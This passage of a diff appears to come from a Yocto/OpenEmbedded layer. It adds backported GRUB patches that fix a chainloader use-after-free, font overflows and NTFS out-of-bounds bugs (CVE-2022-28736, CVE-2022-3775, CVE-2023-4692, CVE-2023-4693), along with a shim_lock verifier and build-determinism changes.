++    case GRUB_FILE_TYPE_XNU_RAMDISK:
++    case GRUB_FILE_TYPE_SIGNATURE:
++    case GRUB_FILE_TYPE_PUBLIC_KEY:
++    case GRUB_FILE_TYPE_PUBLIC_KEY_TRUST:
++    case GRUB_FILE_TYPE_PRINT_BLOCKLIST:
++    case GRUB_FILE_TYPE_TESTLOAD:
++    case GRUB_FILE_TYPE_GET_SIZE:
++    case GRUB_FILE_TYPE_FONT:
++    case GRUB_FILE_TYPE_ZFS_ENCRYPTION_KEY:
++    case GRUB_FILE_TYPE_CAT:
++    case GRUB_FILE_TYPE_HEXCAT:
++    case GRUB_FILE_TYPE_CMP:
++    case GRUB_FILE_TYPE_HASHLIST:
++    case GRUB_FILE_TYPE_TO_HASH:
++    case GRUB_FILE_TYPE_KEYBOARD_LAYOUT:
++    case GRUB_FILE_TYPE_PIXMAP:
++    case GRUB_FILE_TYPE_GRUB_MODULE_LIST:
++    case GRUB_FILE_TYPE_CONFIG:
++    case GRUB_FILE_TYPE_THEME:
++    case GRUB_FILE_TYPE_GETTEXT_CATALOG:
++    case GRUB_FILE_TYPE_FS_SEARCH:
++    case GRUB_FILE_TYPE_LOADENV:
++    case GRUB_FILE_TYPE_SAVEENV:
++    case GRUB_FILE_TYPE_VERIFY_SIGNATURE:
++      *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++      return GRUB_ERR_NONE;
++
++    /* Other files. */
++    default:
++      return grub_error (GRUB_ERR_ACCESS_DENIED, N_("prohibited by secure boot policy"));
++    }
++}
++
++static grub_err_t
++shim_lock_verifier_write (void *context __attribute__ ((unused)), void *buf, grub_size_t size)
++{
++  grub_efi_shim_lock_protocol_t *sl = grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++  if (!sl)
++    return grub_error (GRUB_ERR_ACCESS_DENIED, N_("shim_lock protocol not found"));
++
++  if (sl->verify (buf, size) != GRUB_EFI_SUCCESS)
++    return grub_error (GRUB_ERR_BAD_SIGNATURE, N_("bad shim signature"));
++
++  return GRUB_ERR_NONE;
++}
++
++struct grub_file_verifier shim_lock_verifier =
++  {
++    .name = "shim_lock_verifier",
++    .init = shim_lock_verifier_init,
++    .write = shim_lock_verifier_write
++  };
++
++void
++grub_shim_lock_verifier_setup (void)
++{
++  struct grub_module_header *header;
++  grub_efi_shim_lock_protocol_t *sl =
++    grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++  /* shim_lock is missing, check if GRUB image is built with --disable-shim-lock. */
++  if (!sl)
++    {
++      FOR_MODULES (header)
++	{
++	  if (header->type == OBJ_TYPE_DISABLE_SHIM_LOCK)
++	    return;
++	}
++    }
++
++  /* Secure Boot is off. Do not load shim_lock. */
++  if (grub_efi_get_secureboot () != GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++    return;
++
++  /* Enforce shim_lock_verifier. */
++  grub_verifier_register (&shim_lock_verifier);
++
++  grub_env_set ("shim_lock", "y");
++  grub_env_export ("shim_lock");
++}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index cd129c3..672ae16 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -24,6 +24,7 @@
+ 
+ enum grub_verify_flags
+   {
++    GRUB_VERIFY_FLAGS_NONE		= 0,
+     GRUB_VERIFY_FLAGS_SKIP_VERIFICATION	= 1,
+     GRUB_VERIFY_FLAGS_SINGLE_CHUNK	= 2,
+     /* Defer verification to another authority. */
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-28736.patch b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
new file mode 100644
index 0000000000..4fc9fdaf05
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
@@ -0,0 +1,275 @@
+From 431a111c60095fc973d83fe9209f26f29ce78784 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 11:17:17 +0530
+Subject: [PATCH] CVE-2022-28736
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=04c86e0bb7b58fc2f913f798cdb18934933e532d]
+CVE: CVE-2022-28736
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+loader/efi/chainloader: Use grub_loader_set_ex()
+
+This ports the EFI chainloader to use grub_loader_set_ex() in order to fix
+a use-after-free bug that occurs when grub_cmd_chainloader() is executed
+more than once before a boot attempt is performed.
+
+Fixes: CVE-2022-28736
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/commands/boot.c          | 66 ++++++++++++++++++++++++++----
+ grub-core/loader/efi/chainloader.c | 46 +++++++++++----------
+ include/grub/loader.h              |  5 +++
+ 3 files changed, 87 insertions(+), 30 deletions(-)
+
+diff --git a/grub-core/commands/boot.c b/grub-core/commands/boot.c
+index bbca81e..6151478 100644
+--- a/grub-core/commands/boot.c
++++ b/grub-core/commands/boot.c
+@@ -27,10 +27,20 @@
+ 
+ GRUB_MOD_LICENSE ("GPLv3+");
+ 
+-static grub_err_t (*grub_loader_boot_func) (void);
+-static grub_err_t (*grub_loader_unload_func) (void);
++static grub_err_t (*grub_loader_boot_func) (void *context);
++static grub_err_t (*grub_loader_unload_func) (void *context);
++static void *grub_loader_context;
+ static int grub_loader_flags;
+ 
++struct grub_simple_loader_hooks
++{
++  grub_err_t (*boot) (void);
++  grub_err_t (*unload) (void);
++};
++
++/* Don't heap allocate this to avoid making grub_loader_set() fallible. */
++static struct grub_simple_loader_hooks simple_loader_hooks;
++
+ struct grub_preboot
+ {
+   grub_err_t (*preboot_func) (int);
+@@ -44,6 +54,29 @@ static int grub_loader_loaded;
+ static struct grub_preboot *preboots_head = 0,
+   *preboots_tail = 0;
+ 
++static grub_err_t
++grub_simple_boot_hook (void *context)
++{
++  struct grub_simple_loader_hooks *hooks;
++
++  hooks = (struct grub_simple_loader_hooks *) context;
++  return hooks->boot ();
++}
++
++static grub_err_t
++grub_simple_unload_hook (void *context)
++{
++  struct grub_simple_loader_hooks *hooks;
++  grub_err_t ret;
++
++  hooks = (struct grub_simple_loader_hooks *) context;
++
++  ret = hooks->unload ();
++  grub_memset (hooks, 0, sizeof (*hooks));
++
++  return ret;
++}
++
+ int
+ grub_loader_is_loaded (void)
+ {
+@@ -110,28 +143,45 @@ grub_loader_unregister_preboot_hook (struct grub_preboot *hnd)
+ }
+ 
+ void
+-grub_loader_set (grub_err_t (*boot) (void),
+-		 grub_err_t (*unload) (void),
+-		 int flags)
++grub_loader_set_ex (grub_err_t (*boot) (void *context),
++		    grub_err_t (*unload) (void *context),
++		    void *context,
++		    int flags)
+ {
+   if (grub_loader_loaded && grub_loader_unload_func)
+-    grub_loader_unload_func ();
++    grub_loader_unload_func (grub_loader_context);
+ 
+   grub_loader_boot_func = boot;
+   grub_loader_unload_func = unload;
++  grub_loader_context = context;
+   grub_loader_flags = flags;
+ 
+   grub_loader_loaded = 1;
+ }
+ 
++void
++grub_loader_set (grub_err_t (*boot) (void),
++		 grub_err_t (*unload) (void),
++		 int flags)
++{
++  grub_loader_set_ex (grub_simple_boot_hook,
++		      grub_simple_unload_hook,
++		      &simple_loader_hooks,
++		      flags);
++
++  simple_loader_hooks.boot = boot;
++  simple_loader_hooks.unload = unload;
++}
++
+ void
+ grub_loader_unset(void)
+ {
+   if (grub_loader_loaded && grub_loader_unload_func)
+-    grub_loader_unload_func ();
++    grub_loader_unload_func (grub_loader_context);
+ 
+   grub_loader_boot_func = 0;
+   grub_loader_unload_func = 0;
++  grub_loader_context = 0;
+ 
+   grub_loader_loaded = 0;
+ }
+@@ -158,7 +208,7 @@ grub_loader_boot (void)
+ 	  return err;
+ 	}
+     }
+-  err = (grub_loader_boot_func) ();
++  err = (grub_loader_boot_func) (grub_loader_context);
+ 
+   for (cur = preboots_tail; cur; cur = cur->prev)
+     if (! err)
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index a8d7b91..93a028a 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -44,33 +44,28 @@ GRUB_MOD_LICENSE ("GPLv3+");
+ 
+ static grub_dl_t my_mod;
+ 
+-static grub_efi_physical_address_t address;
+-static grub_efi_uintn_t pages;
+-static grub_efi_device_path_t *file_path;
+-static grub_efi_handle_t image_handle;
+-static grub_efi_char16_t *cmdline;
+-
+ static grub_err_t
+-grub_chainloader_unload (void)
++grub_chainloader_unload (void *context)
+ {
++  grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
++  grub_efi_loaded_image_t *loaded_image;
+   grub_efi_boot_services_t *b;
+ 
++  loaded_image = grub_efi_get_loaded_image (image_handle);
++  if (loaded_image != NULL)
++    grub_free (loaded_image->load_options);
++
+   b = grub_efi_system_table->boot_services;
+   efi_call_1 (b->unload_image, image_handle);
+-  efi_call_2 (b->free_pages, address, pages);
+-
+-  grub_free (file_path);
+-  grub_free (cmdline);
+-  cmdline = 0;
+-  file_path = 0;
+ 
+   grub_dl_unref (my_mod);
+   return GRUB_ERR_NONE;
+ }
+ 
+ static grub_err_t
+-grub_chainloader_boot (void)
++grub_chainloader_boot (void *context)
+ {
++  grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
+   grub_efi_boot_services_t *b;
+   grub_efi_status_t status;
+   grub_efi_uintn_t exit_data_size;
+@@ -139,7 +134,7 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+   char *dir_start;
+   char *dir_end;
+   grub_size_t size;
+-  grub_efi_device_path_t *d;
++  grub_efi_device_path_t *d, *file_path;
+ 
+   dir_start = grub_strchr (filename, ')');
+   if (! dir_start)
+@@ -215,11 +210,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+   grub_efi_status_t status;
+   grub_efi_boot_services_t *b;
+   grub_device_t dev = 0;
+-  grub_efi_device_path_t *dp = 0;
++  grub_efi_device_path_t *dp = NULL, *file_path = NULL;
+   grub_efi_loaded_image_t *loaded_image;
+   char *filename;
+   void *boot_image = 0;
+   grub_efi_handle_t dev_handle = 0;
++  grub_efi_physical_address_t address = 0;
++  grub_efi_uintn_t pages = 0;
++  grub_efi_char16_t *cmdline = NULL;
++  grub_efi_handle_t image_handle = NULL;
+ 
+   if (argc == 0)
+     return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("filename expected"));
+@@ -227,11 +226,6 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ 
+   grub_dl_ref (my_mod);
+ 
+-  /* Initialize some global variables.  */
+-  address = 0;
+-  image_handle = 0;
+-  file_path = 0;
+-
+   b = grub_efi_system_table->boot_services;
+ 
+   file = grub_file_open (filename, GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE);
+@@ -401,7 +395,11 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+   grub_file_close (file);
+   grub_device_close (dev);
+ 
+-  grub_loader_set (grub_chainloader_boot, grub_chainloader_unload, 0);
++  /* We're finished with the source image buffer and file path now. */
++  efi_call_2 (b->free_pages, address, pages);
++  grub_free (file_path);
++
++  grub_loader_set_ex (grub_chainloader_boot, grub_chainloader_unload, image_handle, 0);
+   return 0;
+ 
+  fail:
+@@ -412,11 +410,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+   if (file)
+     grub_file_close (file);
+ 
++  grub_free (cmdline);
+   grub_free (file_path);
+ 
+   if (address)
+     efi_call_2 (b->free_pages, address, pages);
+ 
++  if (image_handle != NULL)
++    efi_call_1 (b->unload_image, image_handle);
++
+   grub_dl_unref (my_mod);
+ 
+   return grub_errno;
+diff --git a/include/grub/loader.h b/include/grub/loader.h
+index 7f82a49..3071a50 100644
+--- a/include/grub/loader.h
++++ b/include/grub/loader.h
+@@ -39,6 +39,11 @@ void EXPORT_FUNC (grub_loader_set) (grub_err_t (*boot) (void),
+ 				    grub_err_t (*unload) (void),
+ 				    int flags);
+ 
++void EXPORT_FUNC (grub_loader_set_ex) (grub_err_t (*boot) (void *context),
++				       grub_err_t (*unload) (void *context),
++				       void *context,
++				       int flags);
++
+ /* Unset current loader, if any.  */
+ void EXPORT_FUNC (grub_loader_unset) (void);
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2022-3775.patch b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
new file mode 100644
index 0000000000..e2e3f35584
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
@@ -0,0 +1,97 @@
+From fdbe7209152ad6f09a1166f64f162017f2145ba3 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Mon, 24 Oct 2022 08:05:35 +0800
+Subject: [PATCH] font: Fix an integer underflow in blit_comb()
+
+The expression (ctx.bounds.height - combining_glyphs[i]->height) / 2 may
+evaluate to a very big invalid value even if both ctx.bounds.height and
+combining_glyphs[i]->height are small integers. For example, if
+ctx.bounds.height is 10 and combining_glyphs[i]->height is 12, this
+expression evaluates to 2147483647 (expected -1). This is because
+coordinates are allowed to be negative but ctx.bounds.height is an
+unsigned int. So, the subtraction operates on unsigned ints and
+underflows to a very big value. The division makes things even worse.
+The quotient is still an invalid value even if converted back to int.
+
+This patch fixes the problem by casting ctx.bounds.height to int. As
+a result the subtraction will operate on int and grub_uint16_t which
+will be promoted to an int. So, the underflow will no longer happen. Other
+uses of ctx.bounds.height (and ctx.bounds.width) are also casted to int,
+to ensure coordinates are always calculated on signed integers.
+
+Fixes: CVE-2022-3775
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=992c06191babc1e109caf40d6a07ec6fdef427af]
+CVE: CVE-2022-3775
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 16 ++++++++--------
+ 1 file changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index f110db9..3b76b22 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1200,12 +1200,12 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+   ctx.bounds.height = main_glyph->height;
+ 
+   above_rightx = main_glyph->offset_x + main_glyph->width;
+-  above_righty = ctx.bounds.y + ctx.bounds.height;
++  above_righty = ctx.bounds.y + (int) ctx.bounds.height;
+ 
+   above_leftx = main_glyph->offset_x;
+-  above_lefty = ctx.bounds.y + ctx.bounds.height;
++  above_lefty = ctx.bounds.y + (int) ctx.bounds.height;
+ 
+-  below_rightx = ctx.bounds.x + ctx.bounds.width;
++  below_rightx = ctx.bounds.x + (int) ctx.bounds.width;
+   below_righty = ctx.bounds.y;
+ 
+   comb = grub_unicode_get_comb (glyph_id);
+@@ -1218,7 +1218,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ 
+       if (!combining_glyphs[i])
+ 	continue;
+-      targetx = (ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
++      targetx = ((int) ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
+       /* CGJ is to avoid diacritics reordering. */
+       if (comb[i].code
+ 	  == GRUB_UNICODE_COMBINING_GRAPHEME_JOINER)
+@@ -1228,8 +1228,8 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ 	case GRUB_UNICODE_COMB_OVERLAY:
+ 	  do_blit (combining_glyphs[i],
+ 		   targetx,
+-		   (ctx.bounds.height - combining_glyphs[i]->height) / 2
+-		   - (ctx.bounds.height + ctx.bounds.y), &ctx);
++		   ((int) ctx.bounds.height - combining_glyphs[i]->height) / 2
++		   - ((int) ctx.bounds.height + ctx.bounds.y), &ctx);
+ 	  if (min_devwidth < combining_glyphs[i]->width)
+ 	    min_devwidth = combining_glyphs[i]->width;
+ 	  break;
+@@ -1302,7 +1302,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ 	  /* Fallthrough.  */
+ 	case GRUB_UNICODE_STACK_ATTACHED_ABOVE:
+ 	  do_blit (combining_glyphs[i], targetx,
+-		   -(ctx.bounds.height + ctx.bounds.y + space
++		   -((int) ctx.bounds.height + ctx.bounds.y + space
+ 		     + combining_glyphs[i]->height), &ctx);
+ 	  if (min_devwidth < combining_glyphs[i]->width)
+ 	    min_devwidth = combining_glyphs[i]->width;
+@@ -1310,7 +1310,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ 
+ 	case GRUB_UNICODE_COMB_HEBREW_DAGESH:
+ 	  do_blit (combining_glyphs[i], targetx,
+-		   -(ctx.bounds.height / 2 + ctx.bounds.y
++		   -((int) ctx.bounds.height / 2 + ctx.bounds.y
+ 		     + combining_glyphs[i]->height / 2), &ctx);
+ 	  if (min_devwidth < combining_glyphs[i]->width)
+ 	    min_devwidth = combining_glyphs[i]->width;
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
new file mode 100644
index 0000000000..0e74870ebf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
+From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:31:57 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
+ attribute for the $MFT file
+
+When parsing an extremely fragmented $MFT file, i.e., the file described
+using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
+containing bytes read from the underlying drive to store sector numbers,
+which are consumed later to read data from these sectors into another buffer.
+
+These sectors numbers, two 32-bit integers, are always stored at predefined
+offsets, 0x10 and 0x14, relative to first byte of the selected entry within
+the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
+
+However, when parsing a specially-crafted file system image, this may cause
+the NTFS code to write these integers beyond the buffer boundary, likely
+causing the GRUB memory allocator to misbehave or fail. These integers contain
+values which are controlled by on-disk structures of the NTFS file system.
+
+Such modification and resulting misbehavior may touch a memory range not
+assigned to the GRUB and owned by firmware or another EFI application/driver.
+
+This fix introduces checks to ensure that these sector numbers are never
+written beyond the boundary.
+
+Fixes: CVE-2023-4692
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
+CVE: CVE-2023-4692
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 18 +++++++++++++++++-
+ 1 file changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 2f34f76..c8d3683 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+     }
+   if (at->attr_end)
+     {
+-      grub_uint8_t *pa;
++      grub_uint8_t *pa, *pa_end;
+ 
+       at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+       if (at->emft_buf == NULL)
+@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ 	    }
+ 	  at->attr_nxt = at->edat_buf;
+ 	  at->attr_end = at->edat_buf + u32at (pa, 0x30);
++	  pa_end = at->edat_buf + n;
+ 	}
+       else
+ 	{
+ 	  at->attr_nxt = at->attr_end + u16at (pa, 0x14);
+ 	  at->attr_end = at->attr_end + u32at (pa, 4);
++	  pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ 	}
+       at->flags |= GRUB_NTFS_AF_ALST;
+       while (at->attr_nxt < at->attr_end)
+@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ 	  at->flags |= GRUB_NTFS_AF_GPOS;
+ 	  at->attr_cur = at->attr_nxt;
+ 	  pa = at->attr_cur;
++
++	  if ((pa >= pa_end) || (pa_end - pa < 0x18))
++	    {
++	      grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++	      return NULL;
++	    }
++
+ 	  grub_set_unaligned32 ((char *) pa + 0x10,
+ 				grub_cpu_to_le32 (at->mft->data->mft_start));
+ 	  grub_set_unaligned32 ((char *) pa + 0x14,
+@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ 	    {
+ 	      if (*pa != attr)
+ 		break;
++
++              if ((pa >= pa_end) || (pa_end - pa < 0x18))
++                {
++	          grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++	          return NULL;
++	        }
++
+ 	      if (read_attr
+ 		  (at, pa + 0x10,
+ 		   u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
new file mode 100644
index 0000000000..1e6b6efdec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
+From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:32:33 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
+ $DATA attribute
+
+When reading a file containing resident data, i.e., the file data is stored in
+the $DATA attribute within the NTFS file record, not in external clusters,
+there are no checks that this resident data actually fits the corresponding
+file record segment.
+
+When parsing a specially-crafted file system image, the current NTFS code will
+read the file data from an arbitrary, attacker-chosen memory offset and of
+arbitrary, attacker-chosen length.
+
+This allows an attacker to display arbitrary chunks of memory, which could
+contain sensitive information like password hashes or even plain-text,
+obfuscated passwords from BS EFI variables.
+
+This fix implements a check to ensure that resident data is read from the
+corresponding file record segment only.
+
+Fixes: CVE-2023-4693
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
+CVE: CVE-2023-4693
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index c8d3683..4d1fe42 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
+     {
+       if (ofs + len > u32at (pa, 0x10))
+ 	return grub_error (GRUB_ERR_BAD_FS, "read out of range");
+-      grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
++
++      if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++	return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
++
++      if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++	return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++      if (u16at (pa, 0x14) + u32at (pa, 0x10) >
++	  (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
++	return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++      grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
+       return 0;
+     }
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/determinism.patch b/meta/recipes-bsp/grub/files/determinism.patch
new file mode 100644
index 0000000000..bd4e7188ec
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/determinism.patch
@@ -0,0 +1,56 @@
+The output in moddep.lst generated from syminfo.lst using genmoddep.awk is
+not deterministic since the order of the dependencies on each line can vary
+depending on how awk sorts the values in the array.
+
+Be deterministic in the output by sorting the dependencies on each line.
+
+Also, the output of the SOURCES lines in grub-core/Makefile.core.am, generated
+from grub-core/Makefile.core.def with gentpl.py is not deterministic due to
+missing sorting of the list used to generate it. Add such a sort.
+
+Also ensure the generated unidata.c file is deterministic by sorting the
+keys of the dict.
+
+Upstream-Status: Submitted [https://lists.gnu.org/archive/html/grub-devel/2023-06/index.html]
+Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: grub-2.04/grub-core/genmoddep.awk
+===================================================================
+--- grub-2.04.orig/grub-core/genmoddep.awk
++++ grub-2.04/grub-core/genmoddep.awk
+@@ -59,7 +59,9 @@ END {
+     }
+     modlist = ""
+     depcount[mod] = 0
+-    for (depmod in uniqmods) {
++    n = asorti(uniqmods, w)
++    for (i = 1; i <= n; i++) {
++      depmod = w[i]
+       modlist = modlist " " depmod;
+       inverse_dependencies[depmod] = inverse_dependencies[depmod] " " mod
+       depcount[mod]++
+Index: grub-2.04/gentpl.py
+===================================================================
+--- grub-2.04.orig/gentpl.py
++++ grub-2.04/gentpl.py
+@@ -568,6 +568,7 @@ def foreach_platform_value(defn, platfor
+     for group in RMAP[platform]:
+         for value in defn.find_all(group + suffix):
+             r.append(closure(value))
++    r.sort()
+     return ''.join(r)
+ 
+ def platform_conditional(platform, closure):
+Index: grub-2.04/util/import_unicode.py
+===================================================================
+--- grub-2.04.orig/util/import_unicode.py
++++ grub-2.04/util/import_unicode.py
+@@ -174,7 +174,7 @@ infile.close ()
+ 
+ outfile.write ("struct grub_unicode_arabic_shape grub_unicode_arabic_shapes[] = {\n ")
+ 
+-for x in arabicsubst:
++for x in sorted(arabicsubst):
+     try:
+         if arabicsubst[x]['join'] == "DUAL":
+             outfile.write ("{0x%x, 0x%x, 0x%x, 0x%x, 0x%x},\n " % (arabicsubst[x][0], arabicsubst[x][1], arabicsubst[x][2], arabicsubst[x][3], arabicsubst[x][4]))
diff --git a/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
new file mode 100644
index 0000000000..d4ba3cafc5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
@@ -0,0 +1,117 @@
+From 1f511ae054fe42dce7aedfbfe0f234fa1e0a7a3e Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 00:51:20 +0800
+Subject: [PATCH] font: Fix size overflow in grub_font_get_glyph_internal()
+
+The length of memory allocation and file read may overflow. This patch
+fixes the problem by using safemath macros.
+
+There is a lot of code repetition like "(x * y + 7) / 8". It is unsafe
+if overflow happens. This patch introduces grub_video_bitmap_calc_1bpp_bufsz().
+It is safe replacement for such code. It has safemath-like prototype.
+
+This patch also introduces grub_cast(value, pointer), it casts value to
+typeof(*pointer) then store the value to *pointer. It returns true when
+overflow occurs or false if there is no overflow. The semantics of arguments
+and return value are designed to be consistent with other safemath macros.
+
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c76ec09ae08155df27cd237eaea150b4f02f532]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c   | 17 +++++++++++++----
+ include/grub/bitmap.h   | 18 ++++++++++++++++++
+ include/grub/safemath.h |  2 ++
+ 3 files changed, 33 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index 5edb477..df17dba 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -733,7 +733,8 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+       grub_int16_t xoff;
+       grub_int16_t yoff;
+       grub_int16_t dwidth;
+-      int len;
++      grub_ssize_t len;
++      grub_size_t sz;
+ 
+       if (index_entry->glyph)
+ 	/* Return cached glyph.  */
+@@ -760,9 +761,17 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ 	  return 0;
+ 	}
+ 
+-      len = (width * height + 7) / 8;
+-      glyph = grub_malloc (sizeof (struct grub_font_glyph) + len);
+-      if (!glyph)
++      /* Calculate real struct size of current glyph. */
++      if (grub_video_bitmap_calc_1bpp_bufsz (width, height, &len) ||
++	  grub_add (sizeof (struct grub_font_glyph), len, &sz))
++	{
++	  remove_font (font);
++	  return 0;
++	}
++
++      /* Allocate and initialize the glyph struct. */
++      glyph = grub_malloc (sz);
++      if (glyph == NULL)
+ 	{
+ 	  remove_font (font);
+ 	  return 0;
+diff --git a/include/grub/bitmap.h b/include/grub/bitmap.h
+index 5728f8c..0d9603f 100644
